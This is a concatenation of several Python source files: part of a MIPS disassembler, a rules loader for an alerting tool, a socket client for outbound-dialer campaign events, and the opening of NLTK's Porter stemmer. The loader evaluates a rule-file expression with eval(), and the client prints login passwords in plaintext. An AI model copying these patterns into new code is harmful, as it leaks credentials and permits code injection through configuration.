return '%s %s, %#x (%s)' % (self.opcode.name, self.targetReg.name, self.immediate, self.sourceReg.name)
if self.opcode in Instruction.RRI_format:
return '%s %s, %s, %#x' % (self.opcode.name, self.targetReg.name, self.sourceReg.name, self.immediate)
if self.opcode in Instruction.RRR_format:
return '%s %s, %s, %s' % (self.opcode.name, self.destReg.name, self.sourceReg.name, self.targetReg.name)
if self.opcode in Instruction.RRS_format:
return '%s %s, %s, %#x' % (self.opcode.name, self.destReg.name, self.targetReg.name, self.shift)
if self.opcode in Instruction.FIR_format:
return '%s %s, %#x (%s)' % (self.opcode.name, self.targetReg.name, self.immediate, self.sourceReg.name)
if self.opcode in Instruction.FF_format:
return '%s_%s %s, %s' % (self.opcode.name, self.fmt.name[0].upper(), self.fd.name, self.ft.name)
if self.opcode in Instruction.FsF_format:
return '%s_%s %s, %s' % (self.opcode.name, self.fmt.name[0].upper(), self.fs.name, self.ft.name)
if self.opcode in Instruction.FFF_format:
return '%s_S %s, %s, %s' % (self.opcode.name, self.fd.name, self.fs.name, self.ft.name)
if self.opcode in Instruction.RF_format:
return '%s%d %s, %s' % (self.opcode.name, self.cop, self.targetReg.name, self.fs.name)
return self.opcode.name
def isBranch(instr):
op = instr >> 26
try:
if MainOp(op) in Instruction.branchOPs:
return True
except:
pass
if op == 1:
return ((instr >> 16) & 0x1f) in [0, 1, 2, 3]
else:
return op == 16 and (instr >> 21) & 0x1f == 8
|
|
# -*- coding: utf-8 -*-
import copy
import datetime
import hashlib
import logging
import os
import sys
import jsonschema
import yaml
import yaml.scanner
from staticconf.loader import yaml_loader
from . import alerts
from . import enhancements
from . import ruletypes
from .opsgenie import OpsGenieAlerter
from .util import dt_to_ts
from .util import dt_to_ts_with_format
from .util import dt_to_unix
from .util import dt_to_unixms
from .util import EAException
from .util import get_module
from .util import ts_to_dt
from .util import ts_to_dt_with_format
from .util import unix_to_dt
from .util import unixms_to_dt
class RulesLoader(object):
# import rule dependency
import_rules = {}
# Required global (config.yaml) configuration options for the loader
required_globals = frozenset([])
# Required local (rule.yaml) configuration options
required_locals = frozenset(['alert', 'type', 'name', 'index'])
# Used to map the names of rules to their classes
rules_mapping = {
'frequency': ruletypes.FrequencyRule,
'any': ruletypes.AnyRule,
'spike': ruletypes.SpikeRule,
'blacklist': ruletypes.BlacklistRule,
'whitelist': ruletypes.WhitelistRule,
'change': ruletypes.ChangeRule,
'flatline': ruletypes.FlatlineRule,
'new_term': ruletypes.NewTermsRule,
'cardinality': ruletypes.CardinalityRule,
'metric_aggregation': ruletypes.MetricAggregationRule,
'percentage_match': ruletypes.PercentageMatchRule,
'spike_aggregation': ruletypes.SpikeMetricAggregationRule,
}
# Used to map names of alerts to their classes
alerts_mapping = {
'email': alerts.EmailAlerter,
'jira': alerts.JiraAlerter,
'opsgenie': OpsGenieAlerter,
'stomp': alerts.StompAlerter,
'debug': alerts.DebugAlerter,
'command': alerts.CommandAlerter,
'sns': alerts.SnsAlerter,
'hipchat': alerts.HipChatAlerter,
'stride': alerts.StrideAlerter,
'ms_teams': alerts.MsTeamsAlerter,
'slack': alerts.SlackAlerter,
'mattermost': alerts.MattermostAlerter,
'pagerduty': alerts.PagerDutyAlerter,
'exotel': alerts.ExotelAlerter,
'twilio': alerts.TwilioAlerter,
'victorops': alerts.VictorOpsAlerter,
'telegram': alerts.TelegramAlerter,
'googlechat': alerts.GoogleChatAlerter,
'gitter': alerts.GitterAlerter,
'servicenow': alerts.ServiceNowAlerter,
'alerta': alerts.AlertaAlerter,
'post': alerts.HTTPPostAlerter,
'hivealerter': alerts.HiveAlerter
}
# A partial ordering of alert types. Relative order will be preserved in the resulting alerts list
# For example, jira goes before email so the ticket # will be added to the resulting email.
alerts_order = {
'jira': 0,
'email': 1
}
base_config = {}
def __init__(self, conf):
# schema for rule yaml
self.rule_schema = jsonschema.Draft7Validator(
yaml.load(open(os.path.join(os.path.dirname(__file__), 'schema.yaml')), Loader=yaml.FullLoader))
self.base_config = copy.deepcopy(conf)
def load(self, conf, args=None):
"""
Discover and load all the rules as defined in the conf and args.
:param dict conf: Configuration dict
:param dict args: Arguments dict
:return: List of rules
:rtype: list
"""
names = []
use_rule = None if args is None else args.rule
# Load each rule configuration file
rules = []
rule_files = self.get_names(conf, use_rule)
for rule_file in rule_files:
try:
rule = self.load_configuration(rule_file, conf, args)
# A rule failed to load, don't try to process it
if not rule:
logging.error('Invalid rule file skipped: %s' % rule_file)
continue
# By setting "is_enabled: False" in rule file, a rule is easily disabled
if 'is_enabled' in rule and not rule['is_enabled']:
continue
if rule['name'] in names:
raise EAException('Duplicate rule named %s' % (rule['name']))
except EAException as e:
raise EAException('Error loading file %s: %s' % (rule_file, e))
rules.append(rule)
names.append(rule['name'])
return rules
def get_names(self, conf, use_rule=None):
"""
Return a list of rule names that can be passed to `get_yaml` to retrieve.
:param dict conf: Configuration dict
:param str use_rule: Limit to only specified rule
:return: A list of rule names
:rtype: list
"""
raise NotImplementedError()
def get_hashes(self, conf, use_rule=None):
"""
Discover and get the hashes of all the rules as defined in the conf.
:param dict conf: Configuration
:param str use_rule: Limit to only specified rule
:return: Dict of rule name to hash
:rtype: dict
"""
raise NotImplementedError()
def get_yaml(self, filename):
"""
Get and parse the yaml of the specified rule.
:param str filename: Rule to get the yaml
:return: Rule YAML dict
:rtype: dict
"""
raise NotImplementedError()
def get_import_rule(self, rule):
"""
Retrieve the name of the rule to import.
:param dict rule: Rule dict
:return: rule name that will all `get_yaml` to retrieve the yaml of the rule
:rtype: str
"""
return rule['import']
def load_configuration(self, filename, conf, args=None):
""" Load a yaml rule file and fill in the relevant fields with objects.
:param str filename: The name of a rule configuration file.
:param dict conf: The global configuration dictionary, used for populating defaults.
:param dict args: Arguments
:return: The rule configuration, a dictionary.
"""
rule = self.load_yaml(filename)
self.load_options(rule, conf, filename, args)
self.load_modules(rule, args)
return rule
def load_yaml(self, filename):
"""
Load the rule including all dependency rules.
:param str filename: Rule to load
:return: Loaded rule dict
:rtype: dict
"""
rule = {
'rule_file': filename,
}
self.import_rules.pop(filename, None) # clear `filename` dependency
while True:
loaded = self.get_yaml(filename)
# Special case for merging filters - if both files specify a filter merge (AND) them
if 'filter' in rule and 'filter' in loaded:
rule['filter'] = loaded['filter'] + rule['filter']
loaded.update(rule)
rule = loaded
if 'import' in rule:
# Find the path of the next file.
import_filename = self.get_import_rule(rule)
# set dependencies
rules = self.import_rules.get(filename, [])
rules.append(import_filename)
self.import_rules[filename] = rules
filename = import_filename
del (rule['import']) # or we could go on forever!
else:
break
return rule
def load_options(self, rule, conf, filename, args=None):
""" Converts time objects, sets defaults, and validates some settings.
:param rule: A dictionary of parsed YAML from a rule config file.
:param conf: The global configuration dictionary, used for populating defaults.
:param filename: Name of the rule
:param args: Arguments
"""
self.adjust_deprecated_values(rule)
try:
self.rule_schema.validate(rule)
except jsonschema.ValidationError as e:
raise EAException("Invalid Rule file: %s\n%s" % (filename, e))
try:
# Set all time based parameters
if 'timeframe' in rule:
rule['timeframe'] = datetime.timedelta(**rule['timeframe'])
if 'realert' in rule:
rule['realert'] = datetime.timedelta(**rule['realert'])
else:
if 'aggregation' in rule:
rule['realert'] = datetime.timedelta(minutes=0)
else:
rule['realert'] = datetime.timedelta(minutes=1)
if 'aggregation' in rule and not rule['aggregation'].get('schedule'):
rule['aggregation'] = datetime.timedelta(**rule['aggregation'])
if 'query_delay' in rule:
rule['query_delay'] = datetime.timedelta(**rule['query_delay'])
if 'buffer_time' in rule:
rule['buffer_time'] = datetime.timedelta(**rule['buffer_time'])
if 'run_every' in rule:
rule['run_every'] = datetime.timedelta(**rule['run_every'])
if 'bucket_interval' in rule:
rule['bucket_interval_timedelta'] = datetime.timedelta(**rule['bucket_interval'])
if 'exponential_realert' in rule:
rule['exponential_realert'] = datetime.timedelta(**rule['exponential_realert'])
if 'kibana4_start_timedelta' in rule:
rule['kibana4_start_timedelta'] = datetime.timedelta(**rule['kibana4_start_timedelta'])
if 'kibana4_end_timedelta' in rule:
rule['kibana4_end_timedelta'] = datetime.timedelta(**rule['kibana4_end_timedelta'])
if 'kibana_discover_from_timedelta' in rule:
rule['kibana_discover_from_timedelta'] = datetime.timedelta(**rule['kibana_discover_from_timedelta'])
if 'kibana_discover_to_timedelta' in rule:
rule['kibana_discover_to_timedelta'] = datetime.timedelta(**rule['kibana_discover_to_timedelta'])
except (KeyError, TypeError) as e:
raise EAException('Invalid time format used: %s' % e)
# Set defaults, copy defaults from config.yaml
for key, val in list(self.base_config.items()):
rule.setdefault(key, val)
rule.setdefault('name', os.path.splitext(filename)[0])
rule.setdefault('realert', datetime.timedelta(seconds=0))
rule.setdefault('aggregation', datetime.timedelta(seconds=0))
rule.setdefault('query_delay', datetime.timedelta(seconds=0))
rule.setdefault('timestamp_field', '@timestamp')
rule.setdefault('filter', [])
rule.setdefault('timestamp_type', 'iso')
rule.setdefault('timestamp_format', '%Y-%m-%dT%H:%M:%SZ')
rule.setdefault('_source_enabled', True)
rule.setdefault('use_local_time', True)
rule.setdefault('description', "")
# Set timestamp_type conversion function, used when generating queries and processing hits
rule['timestamp_type'] = rule['timestamp_type'].strip().lower()
if rule['timestamp_type'] == 'iso':
rule['ts_to_dt'] = ts_to_dt
rule['dt_to_ts'] = dt_to_ts
elif rule['timestamp_type'] == 'unix':
rule['ts_to_dt'] = unix_to_dt
rule['dt_to_ts'] = dt_to_unix
elif rule['timestamp_type'] == 'unix_ms':
rule['ts_to_dt'] = unixms_to_dt
rule['dt_to_ts'] = dt_to_unixms
elif rule['timestamp_type'] == 'custom':
def _ts_to_dt_with_format(ts):
return ts_to_dt_with_format(ts, ts_format=rule['timestamp_format'])
def _dt_to_ts_with_format(dt):
ts = dt_to_ts_with_format(dt, ts_format=rule['timestamp_format'])
if 'timestamp_format_expr' in rule:
# eval expression passing 'ts' and 'dt'
return eval(rule['timestamp_format_expr'], {'ts': ts, 'dt': dt})
else:
return ts
rule['ts_to_dt'] = _ts_to_dt_with_format
rule['dt_to_ts'] = _dt_to_ts_with_format
else:
raise EAException('timestamp_type must be one of iso, unix, or unix_ms')
# Add support for client ssl certificate auth
if 'verify_certs' in conf:
rule.setdefault('verify_certs', conf.get('verify_certs'))
rule.setdefault('ca_certs', conf.get('ca_certs'))
rule.setdefault('client_cert', conf.get('client_cert'))
rule.setdefault('client_key', conf.get('client_key'))
# Set HipChat options from global config
rule.setdefault('hipchat_msg_color', 'red')
rule.setdefault('hipchat_domain', 'api.hipchat.com')
rule.setdefault('hipchat_notify', True)
rule.setdefault('hipchat_from', '')
rule.setdefault('hipchat_ignore_ssl_errors', False)
# Make sure we have required options
if self.required_locals - frozenset(list(rule.keys())):
raise EAException('Missing required option(s): %s' % (', '.join(self.required_locals - frozenset(list(rule.keys())))))
if 'include' in rule and type(rule['include']) != list:
raise EAException('include option must be a list')
raw_query_key = rule.get('query_key')
if isinstance(raw_query_key, list):
if len(raw_query_key) > 1:
rule['compound_query_key'] = raw_query_key
rule['query_key'] = ','.join(raw_query_key)
elif len(raw_query_key) == 1:
rule['query_key'] = raw_query_key[0]
else:
del(rule['query_key'])
if isinstance(rule.get('aggregation_key'), list):
rule['compound_aggregation_key'] = rule['aggregation_key']
rule['aggregation_key'] = ','.join(rule['aggregation_key'])
if isinstance(rule.get('compare_key'), list):
rule['compound_compare_key'] = rule['compare_key']
rule['compare_key'] = ','.join(rule['compare_key'])
elif 'compare_key' in rule:
rule['compound_compare_key'] = [rule['compare_key']]
# Add QK, CK and timestamp to include
include = rule.get('include', ['*'])
if 'query_key' in rule:
include.append(rule['query_key'])
if 'compound_query_key' in rule:
include += rule['compound_query_key']
if 'compound_aggregation_key' in rule:
include += rule['compound_aggregation_key']
if 'compare_key' in rule:
include.append(rule['compare_key'])
if 'compound_compare_key' in rule:
include += rule['compound_compare_key']
if 'top_count_keys' in rule:
include += rule['top_count_keys']
include.append(rule['timestamp_field'])
rule['include'] = list(set(include))
# Check that generate_kibana_url is compatible with the filters
if rule.get('generate_kibana_link'):
for es_filter in rule.get('filter'):
if es_filter:
if 'not' in es_filter:
es_filter = es_filter['not']
if 'query' in es_filter:
es_filter = es_filter['query']
if list(es_filter.keys())[0] not in ('term', 'query_string', 'range'):
raise EAException(
'generate_kibana_link is incompatible with filters other than term, query_string and range.'
'Consider creating a dashboard and using use_kibana_dashboard instead.')
# Check that doc_type is provided if use_count/terms_query
if rule.get('use_count_query') or rule.get('use_terms_query'):
if 'doc_type' not in rule:
raise EAException('doc_type must be specified.')
# Check that query_key is set if use_terms_query
if rule.get('use_terms_query'):
if 'query_key' not in rule:
raise EAException('query_key must be specified with use_terms_query')
# Warn if use_strf_index is used with %y, %M or %D
# (%y = short year, %M = minutes, %D = full date)
if rule.get('use_strftime_index'):
for token in ['%y', '%M', '%D']:
if token in rule.get('index'):
logging.warning('Did you mean to use %s in the index? '
'The index will be formatted like %s' % (token,
datetime.datetime.now().strftime(
rule.get('index'))))
if rule.get('scan_entire_timeframe') and not rule.get('timeframe'):
raise EAException('scan_entire_timeframe can only be used if there is a timeframe specified')
def load_modules(self, rule, args=None):
""" Loads things that could be modules. Enhancements, alerts and rule type. """
# Set match enhancements
match_enhancements = []
for enhancement_name in rule.get('match_enhancements', []):
if enhancement_name in dir(enhancements):
enhancement = getattr(enhancements, enhancement_name)
else:
enhancement = get_module(enhancement_name)
if not issubclass(enhancement, enhancements.BaseEnhancement):
raise EAException("Enhancement module %s not a subclass of BaseEnhancement" % enhancement_name)
match_enhancements.append(enhancement(rule))
rule['match_enhancements'] = match_enhancements
# Convert rule type into RuleType object
if rule['type'] in self.rules_mapping:
rule['type'] = self.rules_mapping[rule['type']]
else:
rule['type'] = get_module(rule['type'])
if not issubclass(rule['type'], ruletypes.RuleType):
raise EAException('Rule module %s is not a subclass of RuleType' % (rule['type']))
# Make sure we have required alert and type options
reqs = rule['type'].required_options
if reqs - frozenset(list(rule.keys())):
raise EAException('Missing required option(s): %s' % (', '.join(reqs - frozenset(list(rule.keys())))))
# Instantiate rule
try:
rule['type'] = rule['type'](rule, args)
except (KeyError, EAException) as e:
raise EAException('Error initializing rule %s: %s' % (rule['name'], e)).with_traceback(sys.exc_info()[2])
# Instantiate alerts only if we're not in debug mode
# In debug mode alerts are not actually sent so don't bother instantiating them
if not args or not args.debug:
rule['alert'] = self.load_alerts(rule, alert_field=rule['alert'])
def load_alerts(self, rule, alert_field):
def normalize_config(alert):
"""Alert config entries are either "alertType" or {"alertType": {"key": "data"}}.
This function normalizes them both to the latter format. """
if isinstance(alert, str):
return alert, rule
elif isinstance(alert, dict):
name, config = next(iter(list(alert.items())))
config_copy = copy.copy(rule)
config_copy.update(config) # warning, this (intentionally) mutates the rule dict
return name, config_copy
else:
raise EAException()
def create_alert(alert, alert_config):
alert_class = self.alerts_mapping.get(alert) or get_module(alert)
if not issubclass(alert_class, alerts.Alerter):
raise EAException('Alert module %s is not a subclass of Alerter' % alert)
missing_options = (rule['type'].required_options | alert_class.required_options) - frozenset(
alert_config or [])
if missing_options:
raise EAException('Missing required option(s): %s' % (', '.join(missing_options)))
return alert_class(alert_config)
try:
if type(alert_field) != list:
alert_field = [alert_field]
alert_field = [normalize_config(x) for x in alert_field]
alert_field = sorted(alert_field, key=lambda a_b: self.alerts_order.get(a_b[0], 1))
# Convert all alerts into Alerter objects
alert_field = [create_alert(a, b) for a, b in alert_field]
except (KeyError, EAException) as e:
raise EAException('Error initiating alert %s: %s' % (rule['alert'], e)).with_traceback(sys.exc_info()[2])
return alert_field
@staticmethod
def adjust_deprecated_values(rule):
# From rename of simple HTTP alerter
if rule.get('type') == 'simple':
rule['type'] = 'post'
if 'simple_proxy' in rule:
rule['http_post_proxy'] = rule['simple_proxy']
if 'simple_webhook_url' in rule:
rule['http_post_url'] = rule['simple_webhook_url']
logging.warning(
'"simple" alerter has been renamed "post" and comptability may be removed in a future release.')
class FileRulesLoader(RulesLoader):
# Required global (config.yaml) configuration options for the loader
required_globals = frozenset(['rules_folder'])
def get_names(self, conf, use_rule=None):
# Passing a filename directly can bypass rules_folder and .yaml checks
if use_rule and os.path.isfile(use_rule):
return [use_rule]
rule_folder = conf['rules_folder']
rule_files = []
if 'scan_subdirectories' in conf and conf['scan_subdirectories']:
for root, folders, files in os.walk(rule_folder):
for filename in files:
if use_rule and use_rule != filename:
continue
if self.is_yaml(filename):
rule_files.append(os.path.join(root, filename))
else:
for filename in os.listdir(rule_folder):
fullpath = os.path.join(rule_folder, filename)
if os.path.isfile(fullpath) and self.is_yaml(filename):
rule_files.append(fullpath)
return rule_files
def get_hashes(self, conf, use_rule=None):
rule_files = self.get_names(conf, use_rule)
rule_mod_times = {}
for rule_file in rule_files:
rule_mod_times[rule_file] = self.get_rule_file_hash(rule_file)
return rule_mod_times
def get_yaml(self, filename):
try:
return yaml_loader(filename)
except yaml.scanner.ScannerError as e:
raise EAException('Could not parse file %s: %s' % (filename, e))
def get_import_rule(self, rule):
"""
Allow for relative paths to the import rule.
:param dict rule:
:return: Path the import rule
:rtype: str
"""
if os.path.isabs(rule['import']):
return rule['import']
else:
return os.path.join(os.path.dirname(rule['rule_file']), rule['import'])
def get_rule_file_hash(self, rule_file):
rule_file_hash = ''
if os.path.exists(rule_file):
with open(rule_file, 'rb') as fh:
rule_file_hash = hashlib.sha1(fh.read()).digest()
for import_rule_file in self.import_rules.get(rule_file, []):
rule_file_hash += self.get_rule_file_hash(import_rule_file)
return rule_file_hash
@staticmethod
def is_yaml(filename):
return filename.endswith('.yaml') or filename.endswith('.yml')
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 27 20:43:15 2016
@author: pchero
"""
import socket
class MainControl(object):
sock = None
connect = False
buf = []
username = None
password = None
ip = None
port = None
data_handler = None
view_handler = None
def __init__(self):
print("MainControl init")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return
def set_data_handler(self, handler):
self.data_handler = handler
def set_veiw_handler(self, handler):
self.view_handler = handler
def send_cmd_async(self, action, data=None):
if self.sock == None or action == None:
return
print("sendCmdAsync. action[%s], data[%s]" % (action, data))
self.sock.send("Action: %s\r\n" % action)
if data != None:
for key, value in data.items():
self.sock.send("%s: %s\r\n" % (key,value))
self.sock.send("\r\n")
return
def recv_data(self):
#print("recv_data")
if self.connect == False:
print("Not connected.")
return False
try:
buf = self.sock.recv(1)
#print("Received data. buf[%s]" % buf)
if buf == None:
return False
self.buf.append(buf)
self._message_handler()
except socket.error:
return False
return True
def _message_parser(self):
if self.buf == None:
return None
# check correct message format
if "\r\n\r\n" != ''.join(self.buf)[-4:]:
return None
data = ''.join(self.buf).split('\r\n')
self.buf = []
# Remove empty objects.
data.remove('')
data.remove('')
# create result
res = {}
try:
for msg in data:
tmp = msg.split(":", 1)
if tmp == None or len(tmp) < 2:
continue
res[tmp[0]] = tmp[1].strip()
except Exception as e:
print("Could not parse message. err[%s]" % e)
return
return res
def login_handler(self, ip=None, port=None, username=None, password=None):
print("loigin_handler. ip[%s], port[%s], username[%s], password[%s]" % (ip, port, username, password))
# set values
self.username = username
self.password = password
self.ip = ip
self.port = port
print("Check value. ip[%s], port[%s], username[%s], password[%s]" % (self.ip, self.port, self.username, self.password))
# connect async
self.sock.connect((self.ip, int(self.port)))
self.sock.setblocking(0)
data = {}
data["Username"] = self.username
data["Secret"] = self.password
print("Send command")
self.send_cmd_async("Login", data)
self.connect = True
print("check connect. connect[%s]" % self.connect)
return
def _message_handler(self):
data = self._message_parser()
if data == None:
return
# get event type
event = data.pop('Event', None)
data.pop("Privilege", None)
print("event type. event[%s]" % event)
if event == "OutCampaignEntry":
self.message_outcampaignentry(data)
return
elif event == "OutCampaignCreate":
self.message_outcampaigncreate(data)
return
elif event == "OutCampaignUpdate":
self.message_outcampaignupdate(data)
return
elif event == "OutCampaignDelete":
self.message_outcampaigndelete(data)
return
elif event == "OutPlanEntry":
self.message_outplanentry(data)
return
elif event == "OutPlanCreate":
self.message_outplancreate(data)
return
elif event == "OutPlanUpdate":
self.message_outplanupdate(data)
return
elif event == "OutPlanDelete":
self.message_outplandelete(data)
return
elif event == "OutDlmaEntry":
self.message_outdlmaentry(data)
return
elif event == "OutDlmaCreate":
self.message_outdlmacreate(data)
return
elif event == "OutDlmaUpdate":
self.message_outdlmaupdate(data)
return
elif event == "OutDlmaDelete":
self.message_outdlmadelete(data)
return
elif event == "OutDestinationEntry":
self.message_outdestinationentry(data)
return
elif event == "OutDestinationCreate":
self.message_outdestinationcreate(data)
return
elif event == "OutDestinationUpdate":
self.message_outdestinationupdate(data)
return
elif event == "OutDestinationDelete":
self.message_outdestinationdelete(data)
return
elif event == "OutDlListEntry":
self.message_outdllistentry(data)
return
elif event == "OutDlListCreate":
self.message_outdllistcreate(data)
return
elif event == "OutDlListUpdate":
self.message_outdllistupdate(data)
return
elif event == "OutDlListDelete":
self.message_outdllistdelete(data)
return
elif event == "OutDialingEntry":
self.message_outdialingentry(data)
return
elif event == "OutDialingCreate":
self.message_outdialingcreate(data)
return
elif event == "OutDialingUpdate":
self.message_outdialingupdate(data)
return
elif event == "OutDialingDelete":
self.message_outdialingdelete(data)
return
else:
print("Could not find correct message handler. event[%s]" % event)
return
def message_outcampaignentry(self, data):
'''
message handler : OutCampaignEntry
'''
print("message_outcampaignentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_insert(uuid, data)
return
def message_outcampaigncreate(self, data):
'''
message handler : OutCampaignCreate
'''
print("message_outcampaigncreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_insert(uuid, data)
return
def message_outcampaignupdate(self, data):
'''
message handler : OutCampaignCreate
'''
print("message_outcampaignupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_update(uuid, data)
return
def message_outcampaigndelete(self, data):
'''
message handler : OutCampaignDelete
'''
print("message_outcampaigndelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_delete(uuid)
return
def message_outplanentry(self, data):
'''
message handler : OutPlanEntry
'''
print("message_outplanentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_insert(uuid, data)
return
def message_outplancreate(self, data):
'''
message handler : OutPlanCreate
'''
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_insert(uuid, data)
return
def message_outplanupdate(self, data):
'''
message handler : OutPlanUpdate
'''
print("message_outplanupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_update(uuid, data)
return
def message_outplandelete(self, data):
'''
message handler : OutPlanDelete
'''
print("message_outplandelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_delete(uuid)
return
def message_outdlmaentry(self, data):
'''
message handler : OutDlmaEntry
'''
print("message_outdlmaentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_insert(uuid, data)
return
def message_outdlmacreate(self, data):
'''
message handler : OutDlmaCreate
'''
print("message_outdlmacreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_insert(uuid, data)
return
def message_outdlmaupdate(self, data):
'''
message handler : OutDlmaCreate
'''
print("message_outdlmaupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_update(uuid, data)
return
def message_outdlmadelete(self, data):
'''
message handler : OutDlmaDelete
'''
print("message_outdlmadelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_delete(uuid)
return
def message_outdestinationentry(self, data):
'''
message handler : OutDestinationEntry
'''
print("message_outdestinationentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_insert(uuid, data)
return
def message_outdestinationcreate(self, data):
'''
message handler : OutDestinationCreate
'''
print("message_outdestinationcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_insert(uuid, data)
return
def message_outdestinationupdate(self, data):
'''
message handler : OutDestinationCreate
'''
print("message_outdestinationupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_update(uuid, data)
return
def message_outdestinationdelete(self, data):
'''
message handler : OutDestinationDelete
'''
print("message_outdestinationdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_delete(uuid)
return
def message_outdllistentry(self, data):
'''
message handler : OutDlListEntry
'''
print("message_outdllistentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_insert(uuid, data)
return
def message_outdllistcreate(self, data):
'''
message handler : OutDlListCreate
'''
print("message_outdllistcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_insert(uuid, data)
return
def message_outdllistupdate(self, data):
'''
message handler : OutDlListUpdate
'''
print("message_outdllistupdate")
print("Detail info. data[%s]" % data)
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_update(uuid, data)
return
def message_outdllistdelete(self, data):
'''
message handler : OutDlListDelete
'''
print("message_outdllistdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_delete(uuid)
return
def message_outdialingtentry(self, data):
'''
message handler : OutDialingEntry
'''
print("message_outdialingtentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_insert(uuid, data)
return
def message_outdialingcreate(self, data):
'''
message handler : OutDialingCreate
'''
print("message_outdialingcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_insert(uuid, data)
return
def message_outdialingupdate(self, data):
'''
message handler : OutDialingUpdate
'''
print("message_outdialingupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_update(uuid, data)
return
def message_outdialingdelete(self, data):
'''
message handler : OutDialingDelete
'''
print("message_outdialingdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_delete(uuid)
return
|
|
# Copyright (c) 2002 Vivake Gupta (vivakeATomniscia.org). All rights reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# This software is maintained by Vivake (vivakeATomniscia.org) and is available at:
# http://www.omniscia.org/~vivake/python/PorterStemmer.py
#
# Additional modifications were made to incorporate this module into
# NLTK. All such modifications are marked with "--NLTK--". The NLTK
# version of this module is maintained by NLTK developers,
# and is available via http://www.nltk.org/
#
# GNU Linking Exception:
# Using this module statically or dynamically with other modules is
# making a combined work based on this module. Thus, the terms and
# conditions of the GNU General Public License cover the whole combination.
# As a special exception, the copyright holders of this module give
# you permission to combine this module with independent modules to
# produce an executable program, regardless of the license terms of these
# independent modules, and to copy and distribute the resulting
# program under terms of your choice, provided that you also meet,
# for each linked independent module, the terms and conditions of
# the license of that module. An independent module is a module which
# is not derived from or based on this module. If you modify this module,
# you may extend this exception to your version of the module, but you
# are not obliged to do so. If you do not wish to do so, delete this
# exception statement from your version.
"""
Porter Stemmer
This is the Porter stemming algorithm, ported to Python from the
version coded up in ANSI C by the author. It follows the algorithm
presented in
Porter, M. "An algorithm for suffix stripping." Program 14.3 (1980): 130-137.
only differing from it at the points marked --DEPARTURE-- and --NEW--
below.
For a more faithful version of the Porter algorithm, see
http://www.tartarus.org/~martin/PorterStemmer/
Later additions:
June 2000
The 'l' of the 'logi' -> 'log' rule is put with the stem, so that
short stems like 'geo' 'theo' etc work like 'archaeo' 'philo' etc.
This follows a suggestion of Barry Wilkins, research student at
Birmingham.
February 2000
the cvc test for not dropping final -e now looks after vc at the
beginning of a word, so are, eve, ice, ore, use keep final -e. In this
test c is any consonant, including w, x and y. This extension was
suggested by Chris Emerson.
-fully -> -ful treated like -fulness -> -ful, and
-tionally -> -tion treated like -tional -> -tion
both in Step 2. These were suggested by Hiranmay Ghosh, of New Delhi.
Invariants proceed, succeed, exceed. Also suggested by Hiranmay Ghosh.
Additional modifications were made to incorperate this module into
nltk. All such modifications are marked with \"--NLTK--\". The nltk
version of this module is maintained by the NLTK developers, and is
available from <http://nltk.sourceforge.net>
"""
from __future__ import print_function
## --NLTK--
## Declare this module's documentation format.
__docformat__ = 'plaintext'
import sys
import re
## --NLTK--
## Import the nltk.stemmer module, which defines the stemmer interface
from api import StemmerI
class PorterStemmer(StemmerI):
## --NLTK--
## Add a module docstring
"""
A word stemmer based on the Porter stemming algorithm.
Porter, M. \"An algorithm for suffix stripping.\"
Program 14.3 (1980): 130-137.
A few minor modifications have been made to Porter's basic
